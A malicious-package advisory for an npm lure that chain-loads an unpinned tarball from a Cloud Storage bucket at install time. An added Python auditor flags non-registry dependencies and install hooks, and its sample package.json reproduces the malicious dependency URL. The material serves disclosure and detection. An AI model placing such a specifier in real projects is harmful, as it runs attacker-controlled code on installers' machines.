npm

@sourceflow-uk/sourceflow-tracker@99.91.9

Vulnerability report · Last retrieved from osv.dev June 23, 2026 at 3:29 AM UTC

Malicious

OSV ID

MAL-2026-5430

Ecosystem

npm

Summary

package.json declares a dependency ltidisafe whose version specifier is the raw URL https://storage.googleapis.com/lscunpentest/pack_ux_foundry.tgz: a tarball hosted on a generic Google Cloud Storage bucket unrelated to the package's nominal publisher (@sourceflow-uk). On npm install, npm fetches and installs that tarball as a transitive dependency, executing any lifecycle scripts (preinstall/install/postinstall) it contains on the installer's machine. The URL is not version-pinned, not hash-verified, and not under the publisher's control: the bucket owner can swap the tarball contents at any time, so a future install can deliver different bytes than a present install with no change to the package itself.

The wrapper package itself is hollow: index.js only runs console.log("hello from lslslslslss"), the description is the garbled string lspodcc, the author is lslsls, and the version is 99.91.9. These attributes are inconsistent with the advertised "sourceflow tracker" functionality and consistent with a throwaway lure whose sole purpose is to chain-load the third-party tarball into the installer's dependency tree.

Source: amazon-inspector (c5bcccc37c380ce54f5bfc2bc2311fbefb6ebc3400a397cbc4afc2188fb3c11d)
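An added detection example, not part of the OSV record or of Amazon Inspector's tooling: the Python below audits a package.json for dependency specifiers that bypass the npm registry (raw URL tarballs like the one in this report, git URLs, local paths) and for install-time lifecycle hooks. The package.json it runs on is constructed from the values the summary quotes, plus one ordinary registry dependency for contrast.

```python
import json
from urllib.parse import urlparse

# Constructed package.json modelled on the wrapper described above (values from the summary).
SAMPLE_PACKAGE_JSON = """{
  "name": "@sourceflow-uk/sourceflow-tracker",
  "version": "99.91.9",
  "description": "lspodcc",
  "author": "lslsls",
  "dependencies": {
    "ltidisafe": "https://storage.googleapis.com/lscunpentest/pack_ux_foundry.tgz",
    "lodash": "^4.17.21"
  }
}"""

DEP_FIELDS = ("dependencies", "devDependencies", "optionalDependencies")
REMOTE_SCHEMES = ("http://", "https://", "git://", "git+", "ssh://")
HOSTED_PREFIXES = ("github:", "gist:", "bitbucket:", "gitlab:")
LOCAL_PREFIXES = ("file:", "link:", "./", "../", "~/", "/")
INSTALL_HOOKS = ("preinstall", "install", "postinstall")

def classify_specifier(spec):
    """Return (kind, host). 'registry' = semver range, tag or npm: alias resolved
    via the registry; anything else bypasses registry version history and
    integrity checks. The bare GitHub user/repo shorthand is not handled."""
    s = spec.strip()
    if s.startswith(REMOTE_SCHEMES):
        host = urlparse(s).hostname or ""
        if s.lower().endswith((".tgz", ".tar.gz", ".tar")):
            return "url-tarball", host  # unpinned, unhashed tarball, as in this report
        return "url-git", host
    if s.startswith(HOSTED_PREFIXES):
        return "hosted-git", s.split(":", 1)[0]
    if s.startswith(LOCAL_PREFIXES):
        return "local-path", ""
    return "registry", ""

def audit_package_json(text):
    """List every non-registry dependency and every install-time lifecycle hook."""
    pkg = json.loads(text)
    findings = []
    for field in DEP_FIELDS:
        for name, spec in pkg.get(field, {}).items():
            kind, host = classify_specifier(spec)
            if kind != "registry":
                findings.append({"field": field, "name": name, "kind": kind, "host": host, "spec": spec})
    for hook in INSTALL_HOOKS:
        if hook in pkg.get("scripts", {}):
            findings.append({"field": "scripts", "name": hook, "kind": "install-hook", "host": "", "spec": pkg["scripts"][hook]})
    return findings
```

Running audit_package_json over a lock-file-resolved tree gives the same check for transitive dependencies, which is where the tarball in this report actually lands.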
